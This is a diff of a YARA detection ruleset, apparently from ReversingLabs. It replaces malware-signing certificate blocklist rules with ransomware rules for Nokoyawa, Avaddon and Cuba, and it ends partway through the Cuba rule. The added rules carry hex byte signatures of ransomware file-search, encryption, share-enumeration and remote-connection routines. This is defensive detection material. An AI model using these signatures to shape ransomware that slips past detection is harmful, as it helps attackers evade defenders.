+            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89
+            44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 89 04 24 48
+            89 4C 24 ?? 48 89 54 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48
+            89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48
+            8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 89 1C 24 48 8B 5C 24 ?? 48 89 5C 24 ??
+            48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B 6C 24 ?? 48 83 C4 ?? C3 E8 ?? ?? ?? ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Win Sp Z O O" and pe.signatures [ i ] . serial == "0b:7c:32:20:8a:95:4a:48:3d:d1:02:e1:be:09:48:67" and 1583884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $get_files_for_encryption_32 and $encrypt_file_32 and $attach_to_server_32 ) or ( $get_files_for_encryption_64 and $encrypt_file_64 and $attach_to_server_64 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3E72Daf2B9A4449E946009E5084A8E76 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Nokoyawa : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Nokoyawa ransomware."
 		author = "ReversingLabs"
-		id = "aa7c6cbe-0794-59e3-a675-93beeccc9784"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "31470ce4-381f-50d2-bbca-03c592e62a7d"
+		date = "2022-06-06"
+		modified = "2022-06-06"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4032-L4048"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f1a7bf6c18e0ebf8aef53feb7d7789ce87c96e00962c64e07a37d968702d2fa5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.Nokoyawa.yara#L1-L104"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "85b7d93db06007d0043b1489b532410ccc700cf082b641fff8a09de2ffe9101d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Nokoyawa"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_shares = {
+            48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            48 8D 44 24 ?? 48 89 44 24 ?? 4C 8B 8C 24 ?? ?? ?? ?? 45 33 C0 33 D2 B9 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? 33 C0 E9 ?? ?? ?? ?? 8B 44 24 ??
+            8B D0 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ?? 33 C0
+            E9 ?? ?? ?? ?? 8B 44 24 ?? 44 8B C0 33 D2 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8D 4C 24
+            ?? 4C 8B 44 24 ?? 48 8D 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C
+            24 ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24
+            ?? 8B 44 24 ?? 39 44 24 ?? 73 ?? 48 8B 44 24 ?? 83 78 ?? ?? 75 ?? 8B 44 24 ?? 48 6B
+            C0 ?? 48 8B 4C 24 ?? 48 8B 54 01 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
+            ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 48 6B C0
+            ?? 48 8B 4C 24 ?? 8B 44 01 ?? 83 E0 ?? 83 F8 ?? 75 ?? 8B 44 24 ?? 48 6B C0 ?? 48 8B
+            4C 24 ?? 48 03 C8 48 8B C1 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? EB ?? 81 7C 24 ??
+            ?? ?? ?? ?? 74 ?? EB ?? 81 7C 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF
+            15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15
+        }
+		$find_files_p1 = {
+            FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83
+            E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 84
+            ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48
+            8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ??
+            ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 48 8D 4C 24
+            ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ??
+            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ??
+            ?? ?? 74 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 3D ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ??
+            ?? ?? ?? 0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48
+        }
+		$find_files_p2 = {
+            98 48 8B 8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ?? ?? ?? ??
+            0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B
+            8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 4C
+            24 ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ??
+            ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B 4C
+            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48
+            81 C4
+        }
+		$encrypt_files = {
+            48 89 4C 24 ?? 48 83 EC ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 89 44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24
+            ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4C 24 ??
+            E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 33 D2
+            48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ??
+            48 8B 4C 24 ?? 48 89 48 ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7
+            40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ??
+            48 89 48 ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 48 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B 4C 24 ?? 48 89 41 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 41 ??
+            48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ?? 48 8B 94 24 ?? ?? ??
+            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 98 4C 8B C0 48 8D
+            15 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 48 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ??
+            48 8B D0 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24
+            ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 45 33 C9 41 B8
+            ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 50 ?? 48 8B 44 24 ?? 48 8B 48 ?? FF 15 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? F0 FF 00 48 83 C4 ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Infoteh63" and pe.signatures [ i ] . serial == "3e:72:da:f2:b9:a4:44:9e:94:60:09:e5:08:4a:8e:76" and 1591787570 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $enum_shares ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_11Edd343E21C36Ac985555D85C16135F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Avaddon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Avaddon ransomware."
 		author = "ReversingLabs"
-		id = "219f709f-4e05-5d0e-97a4-eca1e65153a3"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "f3a57482-5799-594b-bcfa-1137ca04dfd5"
+		date = "2020-10-19"
+		modified = "2020-10-19"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4050-L4066"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "17feeed4be074a30572eb12fc81dc15d1b06f2d3f7b4b4fb4443391c62ac4d9b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Avaddon.yara#L1-L148"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1b2c449d5bad02dd06cb4a980fcca1feaf02b1d8127096bb39deecbc544272a6"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Avaddon"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
+            7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 5B C9 C3 56 8D 5F
+            ?? 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ??
+            59 EB ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E EB ?? 33
+            C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74 ?? 0F
+            B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B 8D ??
+            ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ?? ?? ??
+            ?? 83 C4 ?? E9 ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA
+            42 F7 D8 1B C0 33 FF 57 57 23 C2 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 53 FF
+            15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B F8 E9 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39
+            8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD
+            ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ??
+            ?? 59 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
+            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B F8 56 FF 15 ?? ?? ??
+            ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 45 ?? 8B
+            7D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45 ?? ??
+            ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84
+        }
+		$encrypt_files_p2 = {
+            6A ?? 8D 45 ?? 0F 57 C0 50 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 68 ?? ?? ??
+            ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75
+            ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 F6 39 75 ?? 0F 86 ?? ?? ?? ?? 83
+            7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 4D ?? 03 C6
+            50 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F
+            43 45 ?? 53 51 50 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 53 50 57 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 3B 75 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 74
+        }
+		$encrypt_files_p3 = {
+            8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 51 52 57 89 55 ?? 89 4D ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 8B 9D ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? 72 ?? 8B 00 6A ??
+            8D 4D ?? 51 FF 73 ?? 50 57 FF D6 85 C0 74 ?? 8B 4B ?? 39 4D ?? 75 ?? 8B 45 ?? 89 85
+            ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 6A ?? 8D 85 ?? ??
+            ?? ?? 89 4D ?? 50 57 C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 74 ?? 83 7D ?? ?? 75 ?? B3 ??
+            EB ?? 32 DB 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
+            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1
+            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8A C3 EB ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D
+            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$remote_connection_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 75 ?? 89 85 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 66 89 8D ?? ?? ?? ?? 89 4D ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 66 39 4E ?? 0F 86 ?? ??
+            ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 8B 06 8D 8D ?? ?? ?? ??
+            8B 7E ?? BA ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 6A
+            ?? 6A ?? 57 FF B5 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F8 89 BD ??
+            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
+            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66
+            89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 8D 46 ?? 0F B7 4E ?? 72 ?? 8B
+        }
+		$remote_connection_p2 = {
+            00 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 51 50 57 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B D0 83 7A ?? ?? 72 ?? 8B 12 83 7E ?? ?? 8D 4E ?? 72 ?? 8B 09 83 7E ?? ?? 8D 46 ??
+            72 ?? 8B 00 6A ?? 57 6A ?? 6A ?? 52 51 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ??
+            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 46 ?? 85 C0
+            75 ?? 50 50 50 50 57 FF 15 ?? ?? ?? ?? EB ?? 83 C6 ?? 83 7E ?? ?? 72 ?? 8B 36 50 56
+            6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84
+        }
+		$enum_resources_p1 = {
+            33 D2 89 7D ?? 89 7D ?? 89 75 ?? 89 45 ?? 89 45 ?? 89 4D ?? 89 55 ?? 89 55 ?? 39 56
+            ?? 0F 84 ?? ?? ?? ?? 89 55 ?? 89 55 ?? 89 55 ?? 89 55 ?? 83 7E ?? ?? 8B C6 72 ?? 8B
+            06 8D 4D ?? 51 8D 4D ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ?? ?? ??
+            89 45 ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 89 45 ??
+            C7 45 ?? ?? ?? ?? ?? 0F 82
+        }
+		$enum_resources_p2 = {
+            8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 8B 75 ?? 83 FF ?? 8B 55 ?? 6A
+            ?? 68 ?? ?? ?? ?? 0F 43 CE 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
+            8B 7D ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 75 ?? 66 89 85 ?? ?? ?? ?? 83 CE ??
+            8B 47 ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
+            75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ??
+            ?? 8B C7 72 ?? 8B 07 FF 77 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$enum_resources_p3 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50 8D 45 ??
+            64 A3 ?? ?? ?? ?? 8B 43 ?? 8D 4D ?? 89 45 ?? 89 45 ?? 66 8B 43 ?? 6A ?? 68 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ??
+            8D 4D ?? 8D 45 ?? 0F 43 45 ?? 51 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8D 45 ??
+            8B 75 ?? 8D 4D ?? 8B 55 ?? 83 FF ?? 0F 43 45 ?? 0F 43 CA 8D 04 70 89 45 ?? 8D 45 ??
+            0F 43 45 ?? 8D 04 70 3B C8 74 ?? 66 83 39 ?? 74 ?? 83 C1 ?? 3B C8 75 ?? 3B C8 74 ??
+            8D 51 ?? 3B D0 74
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pribyl Handels GmbH" and pe.signatures [ i ] . serial == "11:ed:d3:43:e2:1c:36:ac:98:55:55:d8:5c:16:13:5f" and 1589925600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $enum_resources_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_093Fe63D1A5F68F14Ecaac871A03F7A3 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cuba : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Cuba ransomware."
